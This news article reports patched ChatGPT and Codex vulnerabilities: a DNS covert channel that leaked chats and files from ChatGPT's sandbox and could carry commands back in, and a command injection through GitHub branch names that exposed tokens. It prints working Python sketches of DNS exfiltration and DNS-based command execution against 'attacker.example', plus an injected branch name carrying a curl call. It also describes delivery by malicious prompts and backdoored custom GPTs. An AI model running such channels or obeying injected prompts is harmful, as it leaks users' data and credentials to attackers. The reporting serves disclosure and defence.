OpenAI Fixes Major ChatGPT Data Leak and Codex Security Flaws

A newly discovered vulnerability in ChatGPT exposed how sensitive user data could be silently leaked, prompting OpenAI to roll out urgent fixes across its AI systems.

Quick Summary (TL;DR):

  • ChatGPT flaw allowed hidden data exfiltration using DNS-based covert channels.
  • Attackers could steal chats and files and run remote commands without user awareness.
  • A separate Codex bug exposed GitHub tokens, risking access to private repositories.
  • OpenAI patched both issues in February 2026, with no confirmed real-world exploitation.

What Happened?

Security researchers uncovered critical vulnerabilities in OpenAI systems that could have allowed attackers to extract sensitive data and compromise developer environments. The flaws impacted both ChatGPT and OpenAI Codex, highlighting growing risks in AI-driven platforms. OpenAI has since fixed both issues following responsible disclosure.

A Hidden Channel That Bypassed AI Safeguards

The most concerning issue affected ChatGPT’s code execution environment, where researchers found a way to bypass built-in protections using a covert DNS-based communication channel.

Normally, ChatGPT blocks direct outbound internet access and requires user approval for data sharing. However, researchers discovered that the system still allowed DNS requests, which attackers exploited as a hidden pathway.

By crafting a malicious prompt, attackers could trick the AI into encoding sensitive information such as:

  • User conversations
  • Uploaded files
  • Confidential inputs

This data was then broken into small fragments and sent out through DNS queries to attacker-controlled servers, all without triggering any warnings.
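
To make the mechanics concrete, here is a minimal sketch of how such a channel can work. It is an illustration only: the domain, chunk size, and encoding are assumptions, not details of OpenAI’s actual sandbox.

    import base64
    import socket

    # Hypothetical DNS covert channel: the secret is chunked into
    # subdomain labels, so each lookup leaks a fragment to whoever runs
    # the authoritative server for "attacker.example" (a placeholder).
    ATTACKER_DOMAIN = "attacker.example"
    LABEL_LIMIT = 63  # DNS caps each label at 63 bytes

    def exfiltrate(secret: bytes) -> None:
        # base32 keeps the payload within DNS's case-insensitive charset
        encoded = base64.b32encode(secret).decode().rstrip("=").lower()
        chunks = [encoded[i:i + LABEL_LIMIT]
                  for i in range(0, len(encoded), LABEL_LIMIT)]
        for seq, chunk in enumerate(chunks):
            # "0.mzxw6ytb...attacker.example" looks like an ordinary
            # lookup, but the label itself carries the stolen data
            try:
                socket.gethostbyname(f"{seq}.{chunk}.{ATTACKER_DOMAIN}")
            except socket.gaierror:
                pass  # failure is irrelevant; the query already left

Because the query itself is the payload, the attacker’s nameserver records the data whether or not it ever returns a useful answer.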

What made this especially dangerous was how invisible the attack was. The system treated DNS traffic as normal infrastructure activity, meaning:

  • No alerts were shown to users.
  • No consent was required.
  • The data transfer remained completely hidden.

Researchers explained, “A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content.”

From Data Theft to Remote Control

The vulnerability went beyond just data leakage. Because the DNS channel worked both ways, attackers could also send commands back into the system.

This effectively allowed:

  • Remote shell access inside ChatGPT’s Linux runtime.
  • Execution of arbitrary commands.
  • Full control outside standard AI guardrails.
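
The return path can be sketched in the same spirit. This assumes the third-party dnspython package and a hypothetical attacker-run TXT record; it illustrates the technique, not OpenAI’s actual environment.

    import base64
    import subprocess

    import dns.resolver  # third-party "dnspython" package, assumed available

    # Hypothetical command channel: poll a TXT record under an
    # attacker-run zone, decode it, and run it in the sandbox shell.
    C2_DOMAIN = "cmd.attacker.example"  # placeholder domain

    def poll_and_run() -> None:
        for record in dns.resolver.resolve(C2_DOMAIN, "TXT"):
            # the TXT payload is assumed to be a base64-encoded command
            command = base64.b64decode(record.strings[0]).decode()
            result = subprocess.run(command, shell=True,
                                    capture_output=True, text=True)
            # result.stdout could then leave via encoded lookups, as in
            # the earlier exfiltration sketch

The same resolver infrastructure that leaks data outward can therefore deliver instructions inward, which is what turns a leak into remote control.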

Attackers could distribute these exploits in two main ways:

  • Disguising malicious prompts as productivity hacks or jailbreak tricks.
  • Embedding harmful logic directly into custom GPTs.

This meant even cautious users could be exposed without realizing it.

Codex Flaw Put Developer Data at Risk

Alongside the ChatGPT issue, a separate vulnerability was found in OpenAI Codex, the company’s AI-powered coding agent widely used in developer workflows.

The flaw involved a command injection vulnerability in how Codex handled GitHub branch names; a simplified sketch of the pattern appears below.

Attackers could:

  • Inject malicious commands through crafted branch names.
  • Execute those commands inside Codex containers.
  • Steal GitHub access tokens used for authentication.

These tokens could then grant:

  • Read and write access to private repositories.
  • Lateral movement across codebases.
  • Potential compromise of entire development environments.
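
OpenAI has not published the vulnerable code, but the bug class is well understood. With a hypothetical payload, the pattern looks roughly like this:

    import re
    import subprocess

    # Hypothetical branch name carrying a payload; everything after the
    # ";" runs as its own command if the name reaches a shell verbatim.
    branch = "main; curl https://attacker.example/leak"

    # VULNERABLE pattern: interpolating the untrusted name into a shell
    # string executes the injected command inside the container.
    subprocess.run(f"git checkout {branch}", shell=True)

    # SAFER pattern: validate against the expected charset, then pass
    # the name as a single argument with no shell involved at all.
    if not re.fullmatch(r"[\w./-]+", branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    subprocess.run(["git", "checkout", branch], check=True)

Passing arguments as a list sidesteps the shell entirely, which is why injection bugs of this class almost always trace back to string-built commands.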

Given Codex’s deep integration with GitHub and enterprise workflows, the impact could have been severe if exploited.

Why Does This Matter for AI Security?

These vulnerabilities highlight a bigger issue: AI tools are no longer just assistants; they are becoming full computing environments that handle sensitive data.

As adoption grows across enterprises, the risks expand as well:

  • AI systems now interact with files, APIs, and internal tools.
  • Hidden attack surfaces like side channels can bypass traditional defenses.
  • Prompt-based attacks and injection techniques are becoming more sophisticated.

Security experts warn that relying only on built-in protections is not enough. Organizations need:

  • Independent monitoring layers (one heuristic is sketched after this list)
  • Stronger input validation
  • Zero-trust approaches for AI systems
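
As one example of what an independent monitoring layer can look for, a simple heuristic flags DNS queries whose labels resemble encoded payloads. The thresholds below are illustrative assumptions, not vendor guidance.

    import math
    from collections import Counter

    def shannon_entropy(s: str) -> float:
        counts = Counter(s)
        return -sum((n / len(s)) * math.log2(n / len(s))
                    for n in counts.values())

    def looks_like_exfil(query: str, max_label: int = 40,
                         entropy_cutoff: float = 3.5) -> bool:
        # Covert-channel queries tend to carry unusually long,
        # high-entropy labels in front of the registered domain.
        labels = query.rstrip(".").split(".")[:-2]
        return any(len(label) > max_label
                   and shannon_entropy(label) > entropy_cutoff
                   for label in labels)

    # An encoded-chunk query trips the heuristic; a normal one does not.
    print(looks_like_exfil(
        "0.mzxw6ytboi2dkmrt4mfrggzdgmztgmzrgiztinjwg44dsnbv.attacker.example"))  # True
    print(looks_like_exfil("api.github.com"))  # False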

OpenAI’s Response and Fixes

OpenAI addressed the Codex vulnerability on February 5, 2026, and patched the ChatGPT data leak issue on February 20, 2026.

Importantly:

  • There is no evidence of active exploitation.
  • Fixes were deployed after responsible disclosure.
  • The company continues to strengthen its AI security framework.

Still, the incident adds to a growing list of concerns around:

  • Prompt injection attacks.
  • Data leakage risks.
  • Unauthorized access through AI tools.

SQ Magazine Takeaway

I think this is a wake-up call for everyone using AI tools daily. We often assume these systems are safe because they feel controlled, but this story proves that hidden layers can behave very differently.

What really stands out to me is how simple the attack could be. Just one malicious prompt or a backdoored GPT could quietly expose sensitive data. That is not a complex hack; it is something any user could unknowingly trigger.

As AI becomes part of everyday work, especially in companies, security cannot be an afterthought. It has to be built around the system, not just inside it.
